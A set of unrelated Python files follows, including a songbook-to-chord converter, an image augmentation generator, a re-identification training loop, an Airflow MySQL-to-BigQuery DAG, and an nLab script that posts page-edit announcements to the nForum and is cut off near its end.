import tkinter as Tkinter from tkinter import font as tkFont from docx import Document import re Tkinter.Frame().destroy() chordFont = tkFont.Font(family="Times New Roman", size=8, weight="bold") textFont = tkFont.Font(family="Times New Roman", size=10) def isTitle(inputString): return any(char.isdigit() for char in inputString) def getTitle(inputString): return inputString.split('.')[1] def getSongNo(inputString): return inputString.split('.')[0] def getScale(inputString): return inputString.split(' ')[0] def get_printed_size(text,font): return font.measure(text) def find_index(s1,loc): for i, c in enumerate(s1): if (get_printed_size(s1[0:i],textFont)) > loc: return i+1 def get_chord_vector(s1): chordregex = '[A-Za-z][A-Za-z0-9]*' cvector = dict() for match in re.finditer(chordregex, s1): s = match.start() e = match.end() cvector[get_printed_size(s1[0:s],chordFont)] = s1[s:e] return cvector def insert_chords(s1,cv): oi = 0 os = "" for loc in cv: i = find_index(s1,loc) os = os + s1[oi:i] + '[' + cv[loc] + ']' oi = i os = os + s1[oi:len(s1)] return os document = Document('data/NTC Songs 1-1000.docx') styles = document.styles count = 0 firstLine = False hasChords = True inChorus = False cv = dict() for para in document.paragraphs: if str(para.style.name) == "SONG TITLE": count = count + 1 # if count > 157: # exit(0) if isTitle(para.text): print ("\n\n{song number: " + getSongNo(para.text.lstrip()) + "}") print ("{title: " + getTitle(para.text.lstrip()) + "}") firstLine = True if (firstLine and (para.style.name == "CHORDS")): print ("Scale: " + getScale(para.text.lstrip())) firstLine = False if (para.style.name == "CHORDS"): hasChords = True cv = get_chord_vector(para.text.replace("\t", " ")) # for x in cv: # print('Chord : %s in location %d' % (cv[x], x)) if (para.style.name == "REGULAR" and para.text.strip()== "Chorus:"): inChorus = True print("{start_of_chorus}") if (inChorus and para.style.name == "REGULAR" and len(para.text.strip()) == 0 ): inChorus = False print("{end_of_chorus}") if (para.style.name == "REGULAR"): if (hasChords): print(insert_chords(para.text.replace("\t", " "), cv)) else: print(para.text) hasChords = False
# -*- coding: utf-8 -*- """" Setup file. """ from setuptools import setup setup( use_scm_version=True, setup_requires=['setuptools_scm'], )
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Sun Mar 25 05:24:19 2018 @author: work """ #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Sat Mar 24 07:53:43 2018 @author: work """ import numpy as np from preprocess import affine_transform_batch, elastic_transform_batch,\ enhance, level_noise, stretch, insert def num_iterator(total, batch_size, shuffle=True): nb_seen = 0 inds = np.arange(total) if shuffle: np.random.shuffle(inds) while True: if nb_seen + batch_size > total: ind_batch = inds[nb_seen:] if shuffle: np.random.shuffle(inds) nb_seen = nb_seen + batch_size - total ind_batch = np.hstack([ind_batch, inds[:nb_seen]]) else: ind_batch = inds[nb_seen:nb_seen+batch_size] nb_seen += batch_size yield ind_batch def data_generator_multi(images, masks, config, shuffle=True, augment=False, batch_size=None, tp_value = 8): batch_size = config.BATCH_SIZE if batch_size is None else batch_size iterator = num_iterator(masks.shape[0], batch_size, shuffle = shuffle) while True: ind_batch = next(iterator) image_batch = images[ind_batch].copy().astype('float32') mask_batch = masks[ind_batch].copy() if augment: tp = np.random.randint(tp_value) if tp==1: if np.random.rand()>0.5: image_batch = image_batch[:,:,::-1] mask_batch = mask_batch[:,:,::-1] else: image_batch = image_batch[:,::-1] mask_batch = mask_batch[:,::-1] elif tp==2: image_batch, mask_batch = affine_transform_batch(image_batch, mask_batch, rotation_range = config.ROTATION_RANGE, width_shift_range = config.WIDTH_SHIFT_RANGE, height_shift_range = config.HEIGHT_SHIFT_RANGE, shear_range = config.SHEAR_RANGE, zoom_range = config.ZOOM_RANGE) elif tp==3: image_batch, mask_batch = elastic_transform_batch(image_batch, mask_batch, alpha = config.ALPHA, sigma = config.SIGMA) elif tp==4: tries = np.random.randint(20,100) max_fails = 5 image_batch, mask_batch = insert(image_batch, mask_batch, tries, max_fails) elif tp==5: image_batch = enhance(image_batch, mask_batch, max_tries=10, max_enhance_ratio=0.8) elif tp==6: image_batch = level_noise(image_batch, mask_batch, max_level_ratio=4, max_noise_ratio=0.05) elif tp==7: image_batch, mask_batch = stretch(image_batch, mask_batch, max_ratio=2) ''' image_max = np.max(image_batch, axis=(1,2,3), keepdims=True) image_max[image_max==0]=1 amax = np.random.randint(200, 256) if augment else 255 image_batch = image_batch/image_max*amax ''' yield [image_batch.astype('float32'), mask_batch]
# encoding: utf-8 """ @author: sherlock @contact: [email protected] """ import logging import time import numpy as np import torch import torch.nn as nn from ignite.engine import Engine, Events from ignite.handlers import ModelCheckpoint, Timer from ignite.metrics import RunningAverage from layers import make_loss from data import make_camstyle_target_unsupdata_loader, make_camstyle_alltrain_data_loader from utils.reid_metric import R1_mAP from utils.reid_metric import Cluster import torch.distributed as dist from torch.distributed import get_rank, get_world_size def create_supervised_trainer(model, optimizer, loss_fn, loss_weight, device=None, device_id=-1): """ Factory function for creating a trainer for supervised models Args: model (`torch.nn.Module`): the model to train optimizer (`torch.optim.Optimizer`): the optimizer to use loss_fn (torch.nn loss function): the loss function to use device (str, optional): device type specification (default: None). Applies to both model and batches. Returns: Engine: a trainer engine with supervised update function """ if device: if torch.cuda.device_count() > 1: model = nn.DataParallel(model) model.to(device) else: model.to(device) def _update(engine, batch): model.train() optimizer.zero_grad() batch = engine.state.batch img, target, setid = batch[0][0], batch[0][1], batch[0][2] img = img.to(device) if torch.cuda.device_count() >= 1 else img target = target.to(device) if torch.cuda.device_count() >= 1 else target feats = model(img) losses = [] for i in range(len(loss_fn)): loss = torch.tensor(0.).cuda() if i == setid[0]: for j in range(len(loss_fn[i])): loss += loss_fn[i][j](feats[i], feats[-1], target) else: loss += 0. * torch.sum(feats[i]) loss += 0. * sum(p.sum() for p in model.parameters()) losses.append(loss) camstyle_img, camstyle_target, camstyle_setid = batch[1][0], batch[1][1], batch[1][2] camstyle_img = camstyle_img.to(device) if torch.cuda.device_count() >= 1 else camstyle_img camstyle_target = camstyle_target.to(device) if torch.cuda.device_count() >= 1 else camstyle_target camstyle_feats = model(camstyle_img) camstyle_losses = [] for i in range(len(loss_fn)): camstyle_loss = torch.tensor(0.).cuda() if i == camstyle_setid[0]: for j in range(len(loss_fn[i])): camstyle_loss += loss_fn[i][j](camstyle_feats[i], camstyle_feats[-1], camstyle_target) else: camstyle_loss += 0. * torch.sum(camstyle_feats[i]) camstyle_loss += 0. * sum(p.sum() for p in model.parameters()) camstyle_losses.append(camstyle_loss) all_losses = [] for i in range(len(loss_fn)): backloss = losses[i] * loss_weight[i] + camstyle_losses[i] * loss_weight[i] if i == len(loss_fn) - 1: backloss.backward() else: backloss.backward(retain_graph=True) all_losses.append(backloss) optimizer.step() return {'src':all_losses[0].item(), 'tgt_unsup':all_losses[1].item()} return Engine(_update) def create_supervised_evaluator(model, metrics, device=None, device_id=-1): """ Factory function for creating an evaluator for supervised models Args: model (`torch.nn.Module`): the model to train metrics (dict of str - :class:`ignite.metrics.Metric`): a map of metric names to Metrics device (str, optional): device type specification (default: None). Applies to both model and batches. Returns: Engine: an evaluator engine with supervised inference function """ def _inference(engine, batch): model.eval() with torch.no_grad(): data, pids, camids, _ = batch data = data.to(device) if torch.cuda.device_count() >= 1 else data feat = model(data) return feat, 0, 0, pids, camids engine = Engine(_inference) for name, metric in metrics.items(): metric.attach(engine, name) return engine def create_psolabel_producer(model, camera_model, metrics, device=None, device_id=-1): """ Factory function for creating an evaluator for supervised models Args: model (`torch.nn.Module`): the model to train camera_model (`torch.nn.Module`): the camera model to extract camera features metrics (dict of str - :class:`ignite.metrics.Metric`): a map of metric names to Metrics device (str, optional): device type specification (default: None). Applies to both model and batches. Returns: Engine: an evaluator engine with supervised inference function """ if device: if torch.cuda.device_count() > 1: camera_model = nn.DataParallel(camera_model) camera_model.to(device) else: camera_model.to(device) def _inference(engine, batch): model.eval() camera_model.eval() with torch.no_grad(): data, pids, camids, trkids = batch data = data.to(device) if torch.cuda.device_count() >= 1 else data feat = model(data) _, camfeat = camera_model(data) return feat, camfeat, pids, camids, trkids engine = Engine(_inference) for name, metric in metrics.items(): metric.attach(engine, name) return engine def do_train( cfg, model, camera_model, val_data_loader, optimizer, scheduler, loss_fn, num_query, start_epoch, device_id ): log_period = cfg.SOLVER.LOG_PERIOD checkpoint_period = cfg.SOLVER.CHECKPOINT_PERIOD eval_period = cfg.SOLVER.EVAL_PERIOD psolabel_period = cfg.TGT_UNSUPDATA.PSOLABEL_PERIOD output_dir = cfg.OUTPUT_DIR epochs = cfg.SOLVER.MAX_EPOCHS device = cfg.MODEL.DEVICE logger = logging.getLogger("reid_baseline.train") logger.info("Start training") trainer = create_supervised_trainer(model, optimizer, loss_fn, cfg.LOSS.LOSS_WEIGHTS, device=device, device_id=device_id) evaluator = create_supervised_evaluator(model, metrics={'r1_mAP': R1_mAP(num_query, True, False, max_rank=50, feat_norm=cfg.TEST.FEAT_NORM)}, device=device, device_id=device_id) psolabel_producer = create_psolabel_producer(model, camera_model, metrics={'cluster': Cluster(topk=cfg.TGT_UNSUPDATA.CLUSTER_TOPK,dist_thrd=cfg.TGT_UNSUPDATA.CLUSTER_DIST_THRD, finetune=cfg.MODEL.FINETUNE)}, device=device, device_id=device_id) if device_id == 0: checkpointer = ModelCheckpoint(output_dir, cfg.MODEL.NAME, checkpoint_period, n_saved=10, require_empty=False) trainer.add_event_handler(Events.EPOCH_COMPLETED, checkpointer, {'model': model.state_dict(), 'optimizer': optimizer.state_dict()}) timer = Timer(average=True) timer.attach(trainer, start=Events.EPOCH_STARTED, resume=Events.ITERATION_STARTED, pause=Events.ITERATION_COMPLETED, step=Events.ITERATION_COMPLETED) # average metric to attach on trainer RunningAverage(output_transform=lambda x: x['src']).attach(trainer, 'src_loss') RunningAverage(output_transform=lambda x: x['tgt_unsup']).attach(trainer, 'tgt_unsup_loss') @trainer.on(Events.STARTED) def start_training(engine): engine.state.epoch = start_epoch @trainer.on(Events.EPOCH_STARTED) def adjust_learning_rate(engine): scheduler.step() def cycle(iterable): while True: for i in iterable: yield i @trainer.on(Events.ITERATION_COMPLETED) def log_training_loss(engine): iter = (engine.state.iteration - 1) % len(alltrain_data_loader) + 1 if iter % log_period == 0: if cfg.DATALOADER.SAMPLER_PROB[0] != 0: src_loss = engine.state.metrics['src_loss']/cfg.DATALOADER.SAMPLER_PROB[0] else: src_loss = 0. if cfg.DATALOADER.SAMPLER_PROB[1] != 0: tgt_unsup_loss = engine.state.metrics['tgt_unsup_loss']/cfg.DATALOADER.SAMPLER_PROB[1] else: tgt_unsup_loss = 0. logger.info("Epoch[{}] Iter[{}/{}] src: {:.3f}, unsup: {:.3f}, lr: {:.2e}/{:.2e}" .format(engine.state.epoch, iter, len(alltrain_data_loader), src_loss, tgt_unsup_loss, scheduler.get_lr()[0],scheduler.get_lr()[-1])) # adding handlers using `trainer.on` decorator API @trainer.on(Events.EPOCH_COMPLETED) def print_times(engine): logger.info('Epoch {} done. Time per batch: {:.3f}[s] Speed: {:.1f}[samples/s]' .format(engine.state.epoch, timer.value() * timer.step_count, alltrain_data_loader.batch_size / timer.value())) logger.info('-' * 10) timer.reset() @trainer.on(Events.EPOCH_COMPLETED) def log_validation_results(engine): if engine.state.epoch % eval_period == 0: evaluator.run(val_data_loader) cmc, mAP = evaluator.state.metrics['r1_mAP'] logger.info("Validation Results - Epoch: {}".format(engine.state.epoch)) logger.info("mAP: {:.1%}".format(mAP)) for r in [1, 5, 10]: logger.info("CMC curve, Rank-{:<3}:{:.1%}".format(r, cmc[r - 1])) @trainer.on(Events.EPOCH_COMPLETED) def update_psolabels(engine): if engine.state.epoch % psolabel_period == 0: camstyle_target_unsupdata_loader = make_camstyle_target_unsupdata_loader(cfg) psolabel_producer.run(camstyle_target_unsupdata_loader) psolabels,cluster_acc,num = psolabel_producer.state.metrics['cluster'] logger.info("Cluster Acc: {:.3f}, classes: {} imgnum: {}".format(cluster_acc,len(set(psolabels))-1,num)) alltrain_data_loader, alltrain_camstyle_data_loader = make_camstyle_alltrain_data_loader(cfg, psolabels) camstyle_target_unsupdata_loader = make_camstyle_target_unsupdata_loader(cfg) psolabel_producer.run(camstyle_target_unsupdata_loader) psolabels,cluster_acc,num = psolabel_producer.state.metrics['cluster'] logger.info("Cluster Acc: {:.3f}, classes: {} imgnum: {}".format(cluster_acc,len(set(psolabels))-1,num)) alltrain_data_loader, alltrain_camstyle_data_loader = make_camstyle_alltrain_data_loader(cfg, psolabels) alltrain_loader_iter = cycle(alltrain_data_loader) alltrain_camstyle_loader_iter = cycle(alltrain_camstyle_data_loader) @trainer.on(Events.ITERATION_STARTED) def generate_batch(engine): current_iter = engine.state.iteration batch = next(alltrain_loader_iter) camstyle_batch = next(alltrain_camstyle_loader_iter) engine.state.batch = [batch, camstyle_batch] num_iters = len(alltrain_data_loader) data = list(range(num_iters)) trainer.run(data, max_epochs=epochs)
from datetime import timedelta from airflow import DAG from airflow.utils.dates import days_ago from airflow.contrib.operators.mysql_to_gcs import MySqlToGoogleCloudStorageOperator from airflow.contrib.operators.gcs_to_bq import GoogleCloudStorageToBigQueryOperator from airflow.contrib.operators.bigquery_operator import BigQueryOperator default_args = { 'owner': 'rendy', 'depends_on_past': False, 'start_date': days_ago(2), 'email': ['[email protected]'], 'email_on_failure': False, 'email_on_retry': False, 'retries': 1, 'retry_delay': timedelta(minutes=5), } bucket_name = 'rendy-test' # change to your bucket name here sales_filename = 'sales_export.json' sales_schema_filename = 'sales_schema.json' with DAG('devfest2020', schedule_interval=timedelta(days=1), default_args=default_args) as dag: extract = MySqlToGoogleCloudStorageOperator( task_id='extract', sql='SELECT * FROM test_db.sales_table st', # change to your mysql table bucket=bucket_name, filename=sales_filename, schema_filename=sales_schema_filename, mysql_conn_id='devfest2020', # change to your mysql connection id ) load = GoogleCloudStorageToBigQueryOperator( task_id='load', destination_project_dataset_table='project.rendy_test.sales', #change to your bq bucket=bucket_name, source_objects=[sales_filename], schema_object=sales_schema_filename, write_disposition='WRITE_TRUNCATE', create_disposition='CREATE_IF_NEEDED', source_format='NEWLINE_DELIMITED_JSON' ) transform = BigQueryOperator( task_id='transform', sql="SELECT * REPLACE(REGEXP_REPLACE(cellphone, '[^0-9]', '') AS cellphone) FROM 'project.rendy_test.sales", use_legacy_sql=False, destination_dataset_table='project.rendy_test.sales_clean' #change to your bq ) extract >> load >> transform
#!/usr/bin/env python import argparse import sys """ This script generates a source file suitable for compilation. Because our parser generator (Lemon) always outputs the same symbols, we need a way to namespace them so that they don't crash. The approach we use will leave the file as-is, but generate an include wrapper, so that the symbols are changed before the actual source file is included, and then compiled with the macro definition instead. This script writes to stdout; the output may be captured and redirected to another file. """ ap = argparse.ArgumentParser() ap.add_argument('-p', '--prefix', help='Prefix for function names', required=True) ap.add_argument('-i', '--include', help='Next-include for actual parser code', default='parser.c.inc') options = ap.parse_args() fp = sys.stdout NAMES = ( 'Parse', 'ParseTrace', 'ParseAlloc', 'ParseFree', 'ParseInit', 'ParseFinalize', 'ParseStackPeack') for name in NAMES: fp.write('#define {name} {prefix}_{name}\n'.format(name=name, prefix=options.prefix)) fp.flush() fp.write('#include "{}"\n'.format(options.include)) fp.flush()
#!/usr/bin/python3.7 """ API for generating an nForum post following an nLab page edit --- To use, set up (if it is not already in place) a virtual environment as follows. python3 -m venv venv source venv/bin/activate pip3 install MySQLdb deactivate Once the virtual environment has been set up, to use the API, launch the virtual environment by running: source venv/bin/activate Then run the script as follows (it will not work if using the ./ syntax). python generate_nforum_post_from_nlab_edit.py --help This will describe the available options. As will be seen, there are two subcommands, 'create' and 'edit', whose descriptions can be obtained by running python generate_nforum_post_from_nlab_edit.py create --help or python generate_nforum_post_from_nlab_edit.py edit --help When finished, shut down the virtual environment by running: deactivate """ import argparse import datetime import logging import MySQLdb import os import sys import time import urllib.parse """ Initialises logging. Logs to nforum_announcer.log """ logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) logging.Formatter.converter = time.gmtime logging_formatter = logging.Formatter( "%(asctime)s %(levelname)s %(name)s %(message)s") log_directory = os.environ["NLAB_LOG_DIRECTORY"] logging_file_handler = logging.FileHandler( os.path.join(log_directory, "nforum_announcer.log")) logging_file_handler.setFormatter(logging_formatter) logger.addHandler(logging_file_handler) class FailedToCarryOutQueryException(Exception): pass """ For a single database query """ def execute_single_with_parameters(query, parameters): database_user = os.environ["NLAB_DATABASE_USER"] database_password = os.environ["NLAB_DATABASE_PASSWORD"] database_name = os.environ["NLAB_DATABASE_NAME"] database_connection = MySQLdb.connect( user = database_user, password= database_password, db = database_name, charset = "utf8", use_unicode = True) cursor = database_connection.cursor() try: cursor.execute(query, parameters) results = cursor.fetchall() database_connection.commit() except MySQLdb.Error as e: logger.warning( "Failed to carry out the query " + query + " with parameters: " + str(parameters) + ". Error: " + str(e)) database_connection.rollback() raise FailedToCarryOutQueryException() finally: cursor.close() database_connection.close() return results """ For a transaction (list of database queries) """ def execute_with_parameters(queries_with_parameters): database_user = os.environ["NLAB_DATABASE_USER"] database_password = os.environ["NLAB_DATABASE_PASSWORD"] database_name = os.environ["NLAB_DATABASE_NAME"] database_connection = MySQLdb.connect( user = database_user, password= database_password, db = database_name, charset = "utf8", use_unicode = True) cursor = database_connection.cursor() try: for query, parameters in queries_with_parameters: cursor.execute(query, parameters) results = cursor.fetchall() database_connection.commit() cursor.close() except MySQLdb.Error as e: logger.warning( "Failed to carry out the query " + query + " with parameters: " + str(parameters) + ". Error: " + str(e)) database_connection.rollback() raise FailedToCarryOutQueryException() finally: database_connection.close() return results class _NoSuchWebException(Exception): pass def _address_of_web(web_id): query_results = execute_single_with_parameters( "SELECT address FROM webs WHERE id = %s", [ web_id ]) try: return query_results[0][0] except IndexError: raise _NoSuchWebException class NoNForumUserCorrespondingToNLabAuthorException(Exception): pass """ Finds the nForum user with the same 'Name' as an nLab author if there exists such a user (case insensitive). If there is no match or more than one match with 'Name', splits the nLab author at whitespace. If there are exactly two names after the split, tries to match these against FirstName and LastName. If this fails, tries to match against Names, joining the two names with an underscore. If this too fails, tries to find the nLab author in the author_to_user file. """ def nforum_user_id(nlab_author): user_id = None query_results = execute_single_with_parameters( "SELECT UserID FROM mathforge_user WHERE Name = %s", [nlab_author]) try: if len(query_results) <= 1: user_id = query_results[0][0] logger.info( "Successfully associated nLab author " + nlab_author + " to nForum user with UserID: " + str(user_id)) except IndexError: pass if user_id: try: return (user_id, _nforum_local_id(user_id)) except _NoLocalNForumUserCorrespondingToNLabAuthorException: user_id = None pass names = nlab_author.split() if len(names) == 2: query_results = execute_single_with_parameters( "SELECT UserID FROM mathforge_user " + "WHERE FirstName = %s AND LastName = %s", [names[0], names[1]]) try: if len(query_results) <= 1: user_id = query_results[0][0] logger.info( "Successfully associated nLab author " + nlab_author + " to nForum user with FirstName " + names[0] + " and LastName " + names[1] + ". UserID: " + str(user_id)) except IndexError: pass if user_id: try: return (user_id, _nforum_local_id(user_id)) except _NoLocalNForumUserCorrespondingToNLabAuthorException: user_id = None pass names_joined_with_underscore = names[0] + "_" + names[1] query_results = execute_single_with_parameters( "SELECT UserID FROM mathforge_user " + "WHERE Name = %s", [names_joined_with_underscore]) try: if len(query_results) <= 1: user_id = query_results[0][0] logger.info( "Successfully associated nLab author " + nlab_author + " to nForum user " + names_joined_with_underscore + ". UserID: " + str(user_id)) except IndexError: pass if user_id: try: return (user_id, _nforum_local_id(user_id)) except _NoLocalNForumUserCorrespondingToNLabAuthorException: user_id = None pass author_to_user_filename = os.environ["NLAB_AUTHOR_TO_USER_FILE"] with open(author_to_user_filename, "r") as author_to_user_file: for line in author_to_user_file: author_and_user = line.split(",") number_of_columns = len(author_and_user) if (number_of_columns > 2) or (number_of_columns < 2): logger.warning( "Syntax error in author_to_user file at the following " + "line: " + line) else: author = author_and_user[0].strip() if author == nlab_author: user = author_and_user[1].strip() query_results = execute_single_with_parameters( "SELECT UserID FROM mathforge_user " + "WHERE Name = %s", [user]) try: if len(query_results) <= 1: user_id = query_results[0][0] logger.info( "Successfully associated nLab author " + nlab_author + " to nForum user " + user + " using the author_to_user file. UserID: " + str(user_id)) except IndexError: pass if user_id: try: return (user_id, _nforum_local_id(user_id)) except _NoLocalNForumUserCorrespondingToNLabAuthorException: user_id = None pass break logger.info( "Did not find nForum user corresponding to nLab author: " + nlab_author) raise NoNForumUserCorrespondingToNLabAuthorException() class _NoLocalNForumUserCorrespondingToNLabAuthorException(Exception): pass """ Finds the LocalID corresponding to a UserID """ def _nforum_local_id(user_id): query_results = execute_single_with_parameters( "SELECT LocalID FROM mathforge_nforum_User WHERE UserID = %s", [user_id]) try: local_id = query_results[0][0] logger.info( "Successfully looked up nForum LocalID " + str(local_id) + " to nForum UserID: " + str(user_id)) return local_id except IndexError: logger.info( "No LocalID for nForum user with UserID: " + str(user_id)) raise _NoLocalNForumUserCorrespondingToNLabAuthorException() class UnableToDetermineRevisionNumberException(Exception): pass def revision_number(nlab_page_id): query_results = execute_single_with_parameters( "SELECT COUNT(id) FROM revisions WHERE page_id = %s", [nlab_page_id]) try: revision_number = query_results[0][0] logger.info( "Successfully found revision number for nLab page with ID " + str(nlab_page_id) + " to be: " + str(revision_number)) return revision_number except IndexError: logger.warning( "Unable to determine revision number for nLab page with ID: " + str(nlab_page_id)) raise UnableToDetermineRevisionNumberException() class NoExistingDiscussionException(Exception): pass def _latest_changes_category_id(latest_changes_web_name): category_name = "- " + latest_changes_web_name + ": Latest Changes" query_results = execute_single_with_parameters( "SELECT CategoryID FROM mathforge_nforum_Category " + "WHERE Name = %s", [category_name]) try: return query_results[0][0] except IndexError: return 5 """ Finds the DiscussionID of the last used forum thread whose name is that of the nLab page. The search is case insensitive. """ def latest_forum_discussion_id(nlab_page_name, latest_changes_web_name): latest_changes_category_id = _latest_changes_category_id( latest_changes_web_name) query_results = execute_single_with_parameters( "SELECT DiscussionID FROM mathforge_nforum_Discussion " + "WHERE Name = BINARY %s " + "AND CategoryID = %s " + "ORDER BY DateLastActive DESC " + "LIMIT 1", [nlab_page_name, latest_changes_category_id]) try: return query_results[0][0] except IndexError: raise NoExistingDiscussionException() class _ForumPostParameters: _nlab_edit_announcer_user_id = 1691 _nlab_edit_announcer_local_user_id = 693 def __init__( self, nlab_page_name, latest_changes_web_name, web_id, user_id, local_id): self.nlab_page_name = nlab_page_name self.latest_changes_web_name = latest_changes_web_name self.web_id = web_id self.user_id = user_id self.local_id = local_id """ Creates discussion in the nForum in the 'Latest changes' category whose name is the same (case insensitive) as the nLab page. Posts an announcement of the nLab page to the nForum as the first comment in this discussion. """ def create_discussion_and_post_to_it(self, announcement): latest_changes_category_id = _latest_changes_category_id( self.latest_changes_web_name) query_with_parameters_one = ( "INSERT INTO mathforge_nforum_Discussion (" + "AuthUserID, Name, DateCreated, CategoryID) " + "VALUES (%s, %s, NOW(), %s)", [self.user_id, self.nlab_page_name, latest_changes_category_id]) query_with_parameters_two = ( "SET @discussion_id = LAST_INSERT_ID()", []) query_with_parameters_three = ( "INSERT INTO mathforge_nforum_Comment (" + "DiscussionID, AuthUserID, DateCreated, Body, FormatType) " + "VALUES (@discussion_id, %s, NOW(), %s, %s)", [self.user_id, announcement, "MarkdownItex"]) query_with_parameters_four = ( "SET @comment_id = LAST_INSERT_ID()", []) query_with_parameters_five = ( "UPDATE mathforge_nforum_Discussion " + "SET CountComments = 1, " + "DateLastActive = NOW(), " + "FirstCommentID = @comment_id, " + "LastUserID = %s " + "WHERE DiscussionID = @discussion_id", [self.user_id]) query_with_parameters_six = ( "UPDATE mathforge_nforum_User " + "SET CountComments = CountComments + 1, " + "DateLastActive = NOW() " + "WHERE LocalID = %s;", [self.local_id]) queries_with_parameters = [ query_with_parameters_one, query_with_parameters_two, query_with_parameters_three, query_with_parameters_four, query_with_parameters_five, query_with_parameters_six] execute_with_parameters(queries_with_parameters) """ Posts announcement to nForum when there is an existing discussion in the 'Latest changes' category with the same name (case insensitive) as the nLab page. """ def post_to_existing_discussion( self, discussion_id, announcement): query_with_parameters_one = ( "INSERT INTO mathforge_nforum_Comment (" + "DiscussionID, AuthUserID, DateCreated, Body, FormatType) " + "VALUES (%s, %s, NOW(), %s, %s)", [discussion_id, self.user_id, announcement, "MarkdownItex"]) query_with_parameters_two = ( "UPDATE mathforge_nforum_Discussion " + "SET CountComments = CountComments + 1, " + "DateLastActive = NOW(), " + "LastUserID = %s " + "WHERE DiscussionID = %s", [self.user_id, discussion_id]) query_with_parameters_three = ( "UPDATE mathforge_nforum_User " + "SET CountComments = CountComments + 1, " + "DateLastActive = NOW() " + "WHERE LocalID = %s", [self.local_id]) queries_with_parameters = [ query_with_parameters_one, query_with_parameters_two, query_with_parameters_three ] execute_with_parameters(queries_with_parameters) """ Posts announcement to nForum when there is an existing discussion in the 'Latest changes' category with the same name (case insensitive) as the old name of an nLab page whose name has been changed, and changes the name of the discussion to the new name of the nLab page. """ def post_to_existing_discussion_with_name_change( self, discussion_id, announcement): query_with_parameters_one = ( "UPDATE mathforge_nforum_Discussion " + "SET Name = %s " + "WHERE DiscussionID = %s", [self.nlab_page_name, discussion_id]) query_with_parameters_two = ( "INSERT INTO mathforge_nforum_Comment (" + "DiscussionID, AuthUserID, DateCreated, Body, FormatType) " + "VALUES (%s, %s, NOW(), %s, %s)", [discussion_id, self.user_id, announcement, "MarkdownItex"]) query_with_parameters_three = ( "UPDATE mathforge_nforum_Discussion " + "SET CountComments = CountComments + 1, " + "DateLastActive = NOW(), " + "LastUserID = %s " + "WHERE DiscussionID = %s", [self.user_id, discussion_id]) query_with_parameters_four = ( "UPDATE mathforge_nforum_User " + "SET CountComments = CountComments + 1, " + "DateLastActive = NOW() " + "WHERE LocalID = %s", [self.local_id]) queries_with_parameters = [ query_with_parameters_one, query_with_parameters_two, query_with_parameters_three, query_with_parameters_four ] execute_with_parameters(queries_with_parameters) class _CreateForumPostParameters(_ForumPostParameters): def __init__( self, nlab_page_name, latest_changes_web_name, web_id, user_id, local_id, author, announcement): super().__init__( nlab_page_name, latest_changes_web_name, web_id, user_id, local_id) self.author = author if announcement is not None: self.announcement = announcement.strip() else: self.announcement = None """ Comment body for announcing a page creation """ def nforum_announcement(self, found_nforum_user): if not self.announcement: announcement = ( "Page created, but author did not leave any comments.") else: announcement = self.announcement if not found_nforum_user: announcement += ( "\n\n" + self.author) announcement += ( "\n\n" + ", ".join(self.page_links())) return announcement def page_links(self): url_encoded_page_name = urllib.parse.quote_plus(self.nlab_page_name) web_address = _address_of_web(self.web_id) version = ( '<a href="https://ncatlab.org/' + web_address + '/revision/' + url_encoded_page_name + '/' + str(1) + '">v' + str(1) + '</a>') current = ( '<a href="https://ncatlab.org/' + web_address + '/show/' + url_encoded_page_name + '">current</a>') return (version, current) class _EditForumPostParameters(_ForumPostParameters): def __init__( self, nlab_page_name, latest_changes_web_name, web_id, user_id, local_id, author, announcement, page_id): super().__init__( nlab_page_name, latest_changes_web_name, web_id, user_id, local_id) self.author = author if announcement is not None: self.announcement = announcement.strip() else: self.announcement = None self.page_id = page_id """ See if there is an existing nForum discussion thread in the 'Latest changes' category with the same title as the edited nLab page, and post the announcement to this thread if so. If there is more than one, choose the last used. If there is no such thread, create one and post to it. """ def post(self, found_nforum_user): try: discussion_id = latest_forum_discussion_id( self.nlab_page_name, self.latest_changes_web_name) self.post_to_existing_discussion( discussion_id, self.nforum_announcement(found_nforum_user)) except NoExistingDiscussionException: forum_post_parameters = _ForumPostParameters( self.nlab_page_name, self.latest_changes_web_name, self.web_id, self.user_id, self.local_id) forum_post_parameters.create_discussion_and_post_to_it( self.nforum_announcement(found_nforum_user)) def post_with_name_change(self, found_nforum_user, old_page_name): try: discussion_id = latest_forum_discussion_id( old_page_name, self.latest_changes_web_name) self.post_to_existing_discussion_with_name_change( discussion_id, self.nforum_announcement(found_nforum_user)) logger.info( "Successfully changed the title of nForum " + "discussion from " + old_page_name + " to " + self.nlab_page_name) except NoExistingDiscussionException: forum_post_parameters = _ForumPostParameters( self.nlab_page_name, self.latest_changes_web_name, self.web_id, self.user_id, self.local_id) forum_post_parameters.create_discussion_and_post_to_it( self.nforum_announcement(found_nforum_user)) """ Comment body for announcing a page edit """ def nforum_announcement(self, found_nforum_user): if not self.announcement: announcement = ( "Non-trivial edit made, but author did not leave any comments.") else: announcement = self.announcement if not found_nforum_user: announcement += ( "\n\n" + self.author) announcement += ( "\n\n" + ", ".join(self.page_links())) return announcement def page_links(self): url_encoded_page_name = urllib.parse.quote_plus(self.nlab_page_name) web_address = _address_of_web(self.web_id) revision_number_for_edit = revision_number(self.page_id) version = ( '<a href="https://ncatlab.org/' + web_address + '/revision/' + url_encoded_page_name + '/' + str(revision_number_for_edit) + '">v' + str(revision_number_for_edit) + '</a>') current = ( '<a href="https://ncatlab.org/' + web_address + '/show/' + url_encoded_page_name + '">current</a>') if revision_number_for_edit > 1: diff = ( '<a href="https://ncatlab.org/' + web_address + '/revision/diff/' + url_encoded_page_name + '/' + str(revision_number_for_edit) + '">diff</a>') return (diff, version, current) return (version, current) """ Sets up the command line argument parsing """ def argument_parser(): parser = argparse.ArgumentParser( description = "Announces an nLab edit on the nForum") subparsers = parser.add_subparsers(dest="subcommand") parser_create_page = subparsers.add_parser( "create", help = "Announces an nLab page creation on the nForum, creating a " + "new nForum discussion in the 'Latest Changes' category with the " + "same title as the created nLab page, and posting an announcement to " + "it.") parser_edit_page = subparsers.add_parser( "edit", help = "Announces an nLab page edit on the nForum. If it is not a " "trivial edit, finds the latest nForum discussion in the " + "'Latest Changes' category with the same name as the edited nLab " + "page and posts an announcement to it, or creates a new discussion " + "in this category with this title if it does not already exist, and " + "posts an announcement to it. If it is a trivial edit, only logs " + "it. If the edit involves a change of name of the nLab page and a " + "discussion on the nForum with the same title as the old name of the " + "nLab page exists, changes the title of the discussion to the new " + "name of the page.") parser_create_page.add_argument( "nlab_page_name", help = 